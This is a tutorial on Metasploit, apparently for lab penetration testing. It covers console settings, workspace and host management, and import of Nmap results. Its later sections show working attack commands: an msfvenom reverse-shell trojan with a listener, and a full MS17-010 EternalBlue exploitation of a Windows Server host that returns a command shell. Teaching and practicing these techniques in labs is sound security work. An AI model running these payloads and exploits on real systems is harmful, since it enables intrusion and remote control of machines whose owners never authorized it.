I. Configuring the Metasploit environment
1. Customizing the command prompt
msf5 > set Prompt my-msf
Prompt => my-msf
my-msf >
Besides a literal string, the following format specifiers can be used:
%D current directory
%H hostname
%J number of jobs currently running
%L local IP address
%S number of open sessions
%T timestamp (change the format with set PromptTimeFormat %Y-%m-%d)
%U current user name
%W current workspace
Besides the prompt text, the ">" character itself can be changed to another symbol:
my-msf > set PromptChar $
PromptChar => $
my-msf $
2. Enabling timestamps
When running tasks, timestamps on the output let us know when each step happened.
my-msf $ set TimestampOutput true
TimestampOutput => true
true enables timestamps, false disables them.
3. Enabling console logging
When we need a record of our operations, console logging can be enabled (it is off by default):
my-msf $ set ConsoleLogging true
Console logging is now enabled.
ConsoleLogging => true
From then on, everything we do is written to /root/.msf4/logs/console.log (recording starts at the moment logging is enabled).
4. Enabling session logging
Section 3 enabled the console log (a record of the commands we run). Once an attack succeeds and we obtain a session, the session's traffic needs to be logged as well.
msf5 > set SessionLogging true
Session logging will be enabled for future sessions.
SessionLogging => true
5. Setting the log level
msf5 > set LogLevel 2
LogLevel => 2
Log levels are 0, 1, 2 and 3; the higher the value, the more verbose the output.
6. Module ranks
For exploit modules, Metasploit assigns a rank according to how easy the module is to use and how much it can affect the target system.
1951  windows/tftp/threectftpsvc_long_mode   2006-11-27  great    No   3CTftpSvc TFTP Long Mode Buffer Overflow
1952  windows/unicenter/cam_log_security     2005-08-22  great    Yes  CA CAM log_security() Stack Buffer Overflow (Win32)
1953  windows/vnc/realvnc_client             2001-01-29  normal   No   RealVNC 3.3.7 Client Buffer Overflow
1954  windows/vnc/ultravnc_client            2006-04-04  normal   No   UltraVNC 1.0.1 Client Buffer Overflow
1955  windows/vnc/ultravnc_viewer_bof        2008-02-06  normal   No   UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
1956  windows/vnc/winvnc_http_get            2001-01-29  average  No   WinVNC Web Server GET Overflow
1957  windows/vpn/safenet_ike_11             2009-06-01  average  No   SafeNet SoftRemote IKE Service Buffer Overflow
1958  windows/winrm/winrm_script_exec        2012-11-01  manual   No   WinRM Script Exec Remote Code Execution
1959  windows/wins/ms04_045_wins             2004-12-14  great    Yes  MS04-045 Microsoft WINS Service Memory Overwrite
Rank | Value | Meaning |
Manual | 0 | Modules that are hard to exploit successfully |
Low | 100 | Almost never succeeds; success rate below 5% |
Average | 200 | Generally does not succeed |
Normal | 300 | Exploitable on specific versions |
Good | 400 | Usually succeeds |
Great | 500 | Automatically detects exploitable targets; very high success rate |
Excellent | 600 | Will not crash the server and is essentially safe to use; applies to SQL injection, command execution, RFI, LFI and the like |
Some modules have no rank set. If we find one works well, we can assign it a rank with the following command:
set MinimumRank 300 # run use xxx/xxx/xxx first
II. Basic MSF usage
1. Workspace management
1) Viewing workspaces
msf5 > workspace
* default
2) Adding a workspace
msf5 > workspace -a work1
[*] Added workspace: work1
[*] Workspace: work1
3) Viewing workspace details
msf5 > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
         default  7      4         1      0      0      2
         work1    0      0         0      0      0      0
         work2    0      0         0      0      0      0
*        work3    0      0         0      0      0      0
name: workspace name.
hosts: number of hosts recorded in the workspace.
services: number of services recorded in the workspace.
vulns: number of vulnerability records in the workspace.
creds: number of credential records in the workspace.
loots: number of loot items recorded in the workspace.
notes: number of notes recorded in the workspace.
4) Switching workspace
msf5 > workspace work2
[*] Workspace: work2
5) Renaming a workspace
msf5 > workspace -r work3 my_work
[*] Renamed workspace 'work3' to 'my_work'
6) Deleting a workspace
msf5 > workspace -d my_work
[*] Deleted workspace: my_work
Delete all workspaces (including the current default workspace; a fresh default workspace is recreated afterwards):
msf5 > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
[*] Deleted workspace: work1
[*] Deleted workspace: work2
[*] Switched to workspace: default
msf5 > workspace
* default
2. Identifying target hosts
1) Scanning target hosts with nmap
msf5 > db_nmap -sP 192.168.4.0/24
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-24 02:40 EDT
[*] Nmap: Nmap scan report for 17WiFi.lan (192.168.4.1)
[*] Nmap: Host is up (0.00042s latency).
[*] Nmap: MAC Address: 4C:6E:6E:00:EF:E8 (Comnect Technology)
[*] Nmap: Nmap scan report for DESKTOP-6MQMP8A.lan (192.168.4.42)
[*] Nmap: Host is up (0.0017s latency).
[*] Nmap: MAC Address: B4:2E:99:EE:74:35 (Giga-byte Technology)
[*] Nmap: Nmap scan report for 192.168.4.52
[*] Nmap: Host is up (0.00012s latency).
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)
[*] Nmap: Nmap scan report for 192.168.4.199
[*] Nmap: Host is up (0.00016s latency).
[*] Nmap: MAC Address: B4:2E:99:EE:73:E0 (Giga-byte Technology)
[*] Nmap: Nmap scan report for 192.168.4.210
[*] Nmap: Host is up (0.00014s latency).
[*] Nmap: MAC Address: 00:0C:29:7E:61:77 (VMware)
[*] Nmap: Nmap scan report for 192.168.4.211
[*] Nmap: Host is up (0.00014s latency).
[*] Nmap: MAC Address: 00:0C:29:C8:38:DE (VMware)
[*] Nmap: Nmap scan report for parrot.lan (192.168.4.219)
[*] Nmap: Host is up (0.028s latency).
[*] Nmap: MAC Address: 60:D8:19:C4:C4:32 (Hon Hai Precision Ind.)
[*] Nmap: Nmap scan report for kali.lan (192.168.4.146)
[*] Nmap: Host is up.
[*] Nmap: Nmap done: 256 IP addresses (8 hosts up) scanned in 1.31 seconds

msf5 > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  8      0         0      0      0      0
db_nmap invokes the nmap module; its syntax is the same as the Nmap command. After the scan completes, the current workspace shows 8 discovered hosts.
2) Importing third-party scan reports
List the supported report types:
msf5 > db_import
Usage: db_import <filename> [file2...]

Filenames can be globs like *.xml, or **/*.xml which will search recursively
Currently supported file types include:
    Acunetix
    Amap Log
    Amap Log -m
    Appscan
    Burp Session XML
    Burp Issue XML
    CI
    Foundstone
    FusionVM XML
    Group Policy Preferences Credentials
    IP Address List
    IP360 ASPL
    IP360 XML v3
    Libpcap Packet Capture
    Masscan XML
    Metasploit PWDump Export
    Metasploit XML
    Metasploit Zip Export
    Microsoft Baseline Security Analyzer
    NeXpose Simple XML
    NeXpose XML Report
    Nessus NBE Report
    Nessus XML (v1)
    Nessus XML (v2)
    NetSparker XML
    Nikto XML
    Nmap XML
    OpenVAS Report
    OpenVAS XML
    Outpost24 XML
    Qualys Asset XML
    Qualys Scan XML
    Retina XML
    Spiceworks CSV Export
    Wapiti XML
Import an XML file generated by nmap:
msf5 > db_import subnet.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.10.7'
[*] Importing host 192.168.4.1
[*] Importing host 192.168.4.42
[*] Importing host 192.168.4.52
[*] Importing host 192.168.4.199
[*] Importing host 192.168.4.210
[*] Importing host 192.168.4.211
[*] Importing host 192.168.4.146
[*] Successfully imported /root/subnet.xml
3) Viewing the hosts in the workspace
msf5 > hosts

Hosts
=====

address        mac                name                 os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----                 -------  ---------  -----  -------  ----  --------
192.168.4.1    4c:6e:6e:00:ef:e8  17WiFi.lan           Unknown                    device
192.168.4.42   b4:2e:99:ee:74:35  DESKTOP-6MQMP8A.lan  Unknown                    device
192.168.4.52   00:0c:29:fa:dd:2a                       Unknown                    device
192.168.4.146                     kali.lan             Unknown                    device
192.168.4.199  b4:2e:99:ee:73:e0                       Unknown                    device
192.168.4.210  00:0c:29:7e:61:77                       Unknown                    device
192.168.4.211  00:0c:29:c8:38:de                       Unknown                    device
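db_import recognises the Nmap XML format and turns each host element into a row of the hosts table above (address, mac, name). The following is an added example, not code from the page or from Metasploit, that parses that format with the Python standard library and emits a CSV in the spirit of hosts -o. The XML sample is constructed (addresses copied from the scan on this page); real reports should be parsed the same way, and a report from a third party is untrusted input, so the parser rejects documents whose root is not nmaprun and ignores hosts that are not up unless asked otherwise.

```python
import csv
import io
import xml.etree.ElementTree as ET

# Constructed sample in Nmap's XML report format (the shape "nmap -oX" writes).
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -sP -oX subnet.xml 192.168.4.0/24" version="7.80">
  <host><status state="up" reason="arp-response"/>
    <address addr="192.168.4.1" addrtype="ipv4"/>
    <address addr="4C:6E:6E:00:EF:E8" addrtype="mac" vendor="Comnect Technology"/>
    <hostnames><hostname name="17WiFi.lan" type="PTR"/></hostnames>
  </host>
  <host><status state="up" reason="arp-response"/>
    <address addr="192.168.4.52" addrtype="ipv4"/>
    <address addr="00:0C:29:FA:DD:2A" addrtype="mac" vendor="VMware"/>
    <hostnames/>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.168.4.77" addrtype="ipv4"/>
  </host>
  <host><status state="up" reason="localhost-response"/>
    <address addr="192.168.4.146" addrtype="ipv4"/>
    <hostnames><hostname name="kali.lan" type="PTR"/></hostnames>
  </host>
</nmaprun>
"""

COLUMNS = ["address", "mac", "name", "vendor", "state"]


def parse_nmap_xml(xml_text, only_up=True):
    """Return one dict per host, mirroring the address/mac/name columns of `hosts`.

    ElementTree does not resolve external entities, but a report from an
    untrusted source is still attacker-controlled input: we validate the root
    element and take only the attributes we need.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "nmaprun":
        raise ValueError("not an Nmap XML report (root element is %r)" % root.tag)
    hosts = []
    for host in root.iter("host"):
        status = host.find("status")
        state = status.get("state", "unknown") if status is not None else "unknown"
        if only_up and state != "up":
            continue
        rec = {"address": "", "mac": "", "name": "", "vendor": "", "state": state}
        for addr in host.findall("address"):
            kind = addr.get("addrtype")
            if kind in ("ipv4", "ipv6"):
                rec["address"] = addr.get("addr", "")
            elif kind == "mac":
                # msf stores MACs lower-case, as seen in the hosts table above.
                rec["mac"] = addr.get("addr", "").lower()
                rec["vendor"] = addr.get("vendor", "")
        hostname = host.find("hostnames/hostname")  # None for <hostnames/> or absent
        if hostname is not None:
            rec["name"] = hostname.get("name", "")
        hosts.append(rec)
    return hosts


def hosts_to_csv(hosts):
    """Serialise the host records as CSV text, like `hosts -o file.csv`."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=COLUMNS)
    writer.writeheader()
    for rec in hosts:
        writer.writerow(rec)
    return buf.getvalue()


if __name__ == "__main__":
    print(hosts_to_csv(parse_nmap_xml(SAMPLE_NMAP_XML)))
```

Passing only_up=False keeps hosts the scan marked down, which is useful when the report is used as an inventory rather than a target list.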
4) Analyzing vulnerabilities from an imported report
If the imported third-party report includes vulnerability information for a host, it can be analyzed directly:
msf5 > analyze 192.168.4.211
[*] Analyzing 192.168.4.211...
[*] No suggestions for 192.168.4.211.
Here we can see that the imported report contains no vulnerability information for 192.168.4.211.
workspace -v confirms that there are no vulns:
msf5 > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  7      0         0      0      0      7
If a host does have vulnerabilities in the report, analyze will print the path of the matching exploit module, for example exploit/windows/smb/ms04_011_lsass.
3. Managing target hosts
Not every host we scanned will be a penetration-testing target, so the hosts need to be managed.
1) The hosts command
Syntax: hosts [options] [addr1 addr2 ...]
msf5 > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]

OPTIONS:
  -a,--add          Add the hosts instead of searching
  -d,--delete       Delete the hosts instead of searching
  -c <col1,col2>    Only show the given columns (see list below)
  -C <col1,col2>    Only show the given columns until the next restart (see list below)
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in csv format
  -O <column>       Order rows by specified column number
  -R,--rhosts       Set RHOSTS from the results of the search
  -S,--search       Search string to filter by
  -i,--info         Change the info of a host
  -n,--name         Change the name of a host
  -m,--comment      Change the comment of a host
  -t,--tag          Add or specify a tag to a range of hosts

Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags
2) hosts display options
Show only the specified columns:
msf5 > hosts -c address,mac

Hosts
=====

address        mac
-------        ---
192.168.4.1    4c:6e:6e:00:ef:e8
192.168.4.42   b4:2e:99:ee:74:35
192.168.4.52   00:0c:29:fa:dd:2a
192.168.4.146
192.168.4.199  b4:2e:99:ee:73:e0
192.168.4.210  00:0c:29:7e:61:77
192.168.4.211  00:0c:29:c8:38:de
Note that if -c is replaced with -C, the column selection stays in effect until the database is restarted.
Show only hosts that are up:
msf5 > hosts -u
Sort by a column:
msf5 > hosts -O 2

Hosts
=====

address        mac                name                 os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----                 -------  ---------  -----  -------  ----  --------
192.168.4.146                     kali.lan             Unknown                    device
192.168.4.210  00:0c:29:7e:61:77                       Unknown                    device
192.168.4.211  00:0c:29:c8:38:de                       Unknown                    device
192.168.4.52   00:0c:29:fa:dd:2a                       Unknown                    device
192.168.4.1    4c:6e:6e:00:ef:e8  17WiFi.lan           Unknown                    device
192.168.4.199  b4:2e:99:ee:73:e0                       Unknown                    device
192.168.4.42   b4:2e:99:ee:74:35  DESKTOP-6MQMP8A.lan  Unknown                    device
As shown, the output above is sorted by the second column, mac.
3) Adding tags and info
To label a host, we can attach a tag or info to it:
msf5 > hosts 192.168.4.199 -t important
msf5 > hosts 192.168.4.199 -i info199

msf5 > hosts -c address,info

Hosts
=====

address        info
-------        ----
192.168.4.1
192.168.4.42
192.168.4.52
192.168.4.146
192.168.4.199  info199
192.168.4.210
192.168.4.211
4) Renaming a host
msf5 > hosts 192.168.4.1 -n gateway
msf5 > hosts

Hosts
=====

address        mac                name                 os_name  os_flavor  os_sp  purpose  info     comments
-------        ---                ----                 -------  ---------  -----  -------  ----     --------
192.168.4.1    4c:6e:6e:00:ef:e8  gateway              Unknown                    device
192.168.4.42   b4:2e:99:ee:74:35  DESKTOP-6MQMP8A.lan  Unknown                    device
192.168.4.52   00:0c:29:fa:dd:2a                       Unknown                    device
192.168.4.146                     kali.lan             Unknown                    device
192.168.4.199  b4:2e:99:ee:73:e0                       Unknown                    device   info199
192.168.4.210  00:0c:29:7e:61:77                       Unknown                    device
192.168.4.211  00:0c:29:c8:38:de                       Unknown                    device
5) Searching hosts
msf5 > hosts -S kali

Hosts
=====

address        mac  name      os_name  os_flavor  os_sp  purpose  info  comments
-------        ---  ----      -------  ---------  -----  -------  ----  --------
192.168.4.146       kali.lan  Unknown                    device
-S searches for any keyword (case-insensitive).
6) Exporting hosts to a file
msf5 > hosts -o host.csv
[*] Wrote hosts to host.csv
4. Managing other objects in the workspace
Besides hosts, a workspace also holds services, creds (credentials), loots (loot), notes and vulns (vulnerabilities). They are managed much like hosts, so the details are not repeated here.
5. Backing up data
When managing hosts and similar data as described above, -o exports a CSV file, but that backs up only part of the data. To back up the whole workspace, use db_export:
msf5 > db_export -f xml keep.xml
[*] Starting export of workspace default to keep.xml [ xml ]...
[*] Finished export of workspace default to keep.xml [ xml ]...
The saved XML looks like this:
III. Simple Metasploit usage
1. Listing exploit modules
msf5 > show exploits
This lists every exploit module in the current Metasploit version.
1945  windows/tftp/netdecision_tftp_traversal  2009-05-16  excellent  No   NetDecision 4.2 TFTP Writable Directory Traversal Execution
1946  windows/tftp/opentftp_error_code         2008-07-05  average    No   OpenTFTP SP 1.4 Error Packet Overflow
1947  windows/tftp/quick_tftp_pro_mode         2008-03-27  good       No   Quick FTP Pro 2.1 Transfer-Mode Overflow
1948  windows/tftp/tftpd32_long_filename       2002-11-19  average    No   TFTPD32 Long Filename Buffer Overflow
1949  windows/tftp/tftpdwin_long_filename      2006-09-21  great      No   TFTPDWIN v0.4.2 Long Filename Buffer Overflow
1950  windows/tftp/tftpserver_wrq_bof          2008-03-26  normal     No   TFTP Server for Windows 1.4 ST WRQ Buffer Overflow
1951  windows/tftp/threectftpsvc_long_mode     2006-11-27  great      No   3CTftpSvc TFTP Long Mode Buffer Overflow
1952  windows/unicenter/cam_log_security       2005-08-22  great      Yes  CA CAM log_security() Stack Buffer Overflow (Win32)
1953  windows/vnc/realvnc_client               2001-01-29  normal     No   RealVNC 3.3.7 Client Buffer Overflow
1954  windows/vnc/ultravnc_client              2006-04-04  normal     No   UltraVNC 1.0.1 Client Buffer Overflow
1955  windows/vnc/ultravnc_viewer_bof          2008-02-06  normal     No   UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
1956  windows/vnc/winvnc_http_get              2001-01-29  average    No   WinVNC Web Server GET Overflow
1957  windows/vpn/safenet_ike_11               2009-06-01  average    No   SafeNet SoftRemote IKE Service Buffer Overflow
1958  windows/winrm/winrm_script_exec          2012-11-01  manual     No   WinRM Script Exec Remote Code Execution
1959  windows/wins/ms04_045_wins               2004-12-14  great      Yes  MS04-045 Microsoft WINS Service Memory Overwrite
2. Using an exploit (workflow)
msf5 > use exploit/windows/smb/ms06_040_netapi
msf5 exploit(windows/smb/ms06_040_netapi) >
The exploits are sorted by category and stored in the corresponding directories; we just need to use one.
Exploit modules are generally stored under the following directory:
/usr/share/metasploit-framework/modules/exploits/
For example, ms04_031_netdde lives in this directory:
/usr/share/metasploit-framework/modules/exploits/windows/smb
Check how the exploit is used:
msf5 exploit(windows/smb/ms06_040_netapi) > show info

       Name: MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
     Module: exploit/windows/smb/ms06_040_netapi
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2006-08-08

Provided by:
  hdm <x@hdm.io>

Module stability:
 crash-os-restarts crash-service-down

Module reliability:
 unreliable-session

Available targets:
  Id  Name
  --  ----
  0   (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)
  1   (wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4
  2   (wcscpy) Windows XP SP0/SP1
  3   (stack) Windows XP SP1 English
  4   (stack) Windows XP SP1 Italian
  5   (wcscpy) Windows 2003 SP0

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 370
  Avoid: 7 characters

Description:
  This module exploits a stack buffer overflow in the NetApi32
  CanonicalizePathName() function using the NetpwPathCanonicalize RPC
  call in the Server Service. It is likely that other RPC calls could
  be used to exploit this service. This exploit will result in a denial
  of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit
  attempt will likely result in a complete reboot on Windows 2000 and
  the termination of all SMB-related services on Windows XP. The
  default target for this exploit should succeed on Windows NT 4.0,
  Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.

References:
  https://cvedetails.com/cve/CVE-2006-3439/
  OSVDB (27845)
  http://www.securityfocus.com/bid/19409
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/MS06-040
Pay particular attention to the basic options: these are the options that must be set before the exploit can be used.
Select a payload (show payloads):
msf5 exploit(windows/smb/ms06_040_netapi) > show payloads
Many payloads are available; pick the one needed and set it:
msf5 exploit(windows/smb/ms06_040_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
Then set the basic options (according to the basic options listed by show info):
msf5 exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.4.211
RHOSTS => 192.168.4.211
Then launch the attack:
msf5 exploit(windows/smb/ms06_040_netapi) > exploit
exploit launches the attack; run works as well.
Use back to leave the exploit context:
msf5 exploit(windows/smb/ms06_040_netapi) > back
msf5 >
3. Viewing help inside an exploit module
Running help at an exploit module's prompt shows the following content in addition to what help shows at the msf prompt:
msf5 exploit(windows/smb/ms06_040_netapi) > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers

Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    info          Displays information about one or more modules
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index

Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job

Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file

Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials in the database

Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths

Exploit Commands
================

    Command       Description
    -------       -----------
    check         Check to see if a target is vulnerable
    exploit       Launch an exploit attempt
    rcheck        Reloads the module and checks if the target is vulnerable
    recheck       Alias for rcheck
    reload        Just reloads the module
    rerun         Alias for rexploit
    rexploit      Reloads the module and launches an exploit attempt
    run           Alias for exploit

msfconsole
==========

`msfconsole` is the primary interface to Metasploit Framework. There is quite a lot that needs go here, please be patient and keep an eye on this space!

Building ranges and lists
-------------------------

Many commands and options that take a list of things can use ranges to avoid having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs

Commands that take a list of IDs can use ranges to help. Individual IDs must be separated by a `,` (no space allowed) and ranges can be expressed with either `-` or `..`.

### Ranges of IPs

There are several ways to specify ranges of IP addresses that can be mixed together. The first way is a list of IPs separated by just a ` ` (ASCII space), with an optional `,`. The next way is two complete IP addresses in the form of `BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR specifications may also be used, however the whole address must be given to Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC. Additionally, a netmask can be used in conjunction with a domain name to dynamically resolve which block to target. All these methods work for both IPv4 and IPv6 addresses. IPv4 addresses can also be specified with special octet ranges from the [NMAP target specification](https://nmap.org/book/man-target-specification.html)

### Examples

Terminate the first sessions:

    sessions -k 1

Stop some extra running jobs:

    jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

    set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24
Note that the highlighted part (the Exploit Commands section) is specific to help inside an exploit module; the rest is the same as help at the msf prompt.
4. Generating a trojan backdoor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.4.146 LPORT=4444 -f exe > shell.exe
The msfvenom command generates a trojan program carrying the specified payload.
-p specifies the payload type. LHOST is the IP of the controlling side (our host). LPORT is the controlling side's port.
Once this trojan is planted on the attacked host, the program connects back to the IP and port we gave it, giving us a channel over which to run our remote-control commands.
Note that this payload corresponds to the following Ruby file:
/usr/share/metasploit-framework/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
5. Listening on a port and waiting for the reverse connection
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 192.168.4.146
LHOST => 192.168.4.146
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.4.146:4444
exploit/multi/handler is the module dedicated to listening for reverse connections. We run it and set LHOST and LPORT to the IP and port we gave the trojan: we must listen locally on that endpoint and wait for the trojan to connect. Start listening with exploit or run.
IV. Attacking Windows Server 2008 R2 with MS17-010
1. Searching for MS17-010
msf5 > search ms17

Matching Modules
================

   #   Name                                                    Disclosure Date  Rank     Check  Description
   -   ----                                                    ---------------  ----     -----  -----------
   0   auxiliary/admin/mssql/mssql_enum_domain_accounts                         normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   1   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                    normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   2   auxiliary/admin/mssql/mssql_enum_sql_logins                              normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   3   auxiliary/admin/mssql/mssql_escalate_execute_as                          normal   No     Microsoft SQL Server Escalate EXECUTE AS
   4   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                     normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   5   auxiliary/admin/smb/ms17_010_command                    2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   6   auxiliary/scanner/smb/smb_ms17_010                                       normal   No     MS17-010 SMB RCE Detection
   7   exploit/windows/fileformat/office_ms17_11882            2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   8   exploit/windows/smb/doublepulsar_rce                    2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   9   exploit/windows/smb/ms17_010_eternalblue                2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   10  exploit/windows/smb/ms17_010_eternalblue_win8           2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   11  exploit/windows/smb/ms17_010_psexec                     2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2. Using the exploit
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >
3. Setting the target IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.4.142
RHOST => 192.168.4.142
4. Attacking the target
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.4.146:4444
[*] 192.168.4.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.4.142:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit)
[*] 192.168.4.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.4.142:445 - Connecting to target for exploitation.
[+] 192.168.4.142:445 - Connection established for exploitation.
[+] 192.168.4.142:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.4.142:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.4.142:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.4.142:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 192.168.4.142:445 - 0x00000020  72 20 37 36 30 30                                r 7600
[+] 192.168.4.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.4.142:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.4.142:445 - Sending all but last fragment of exploit packet
[*] 192.168.4.142:445 - Starting non-paged pool grooming
[+] 192.168.4.142:445 - Sending SMBv2 buffers
[+] 192.168.4.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.4.142:445 - Sending final SMBv2 buffers.
[*] 192.168.4.142:445 - Sending last fragment of exploit packet!
[*] 192.168.4.142:445 - Receiving response from exploit packet
[+] 192.168.4.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.4.142:445 - Sending egg to corrupted connection.
[*] 192.168.4.142:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.4.146:4444 -> 192.168.4.142:49159) at 2020-04-20 04:52:13 -0400
[+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>
As shown, a Windows cmd shell has been returned through this vulnerability.
5. Backgrounding the session
C:\Windows\system32>background
Background session 1? [y/N]  y
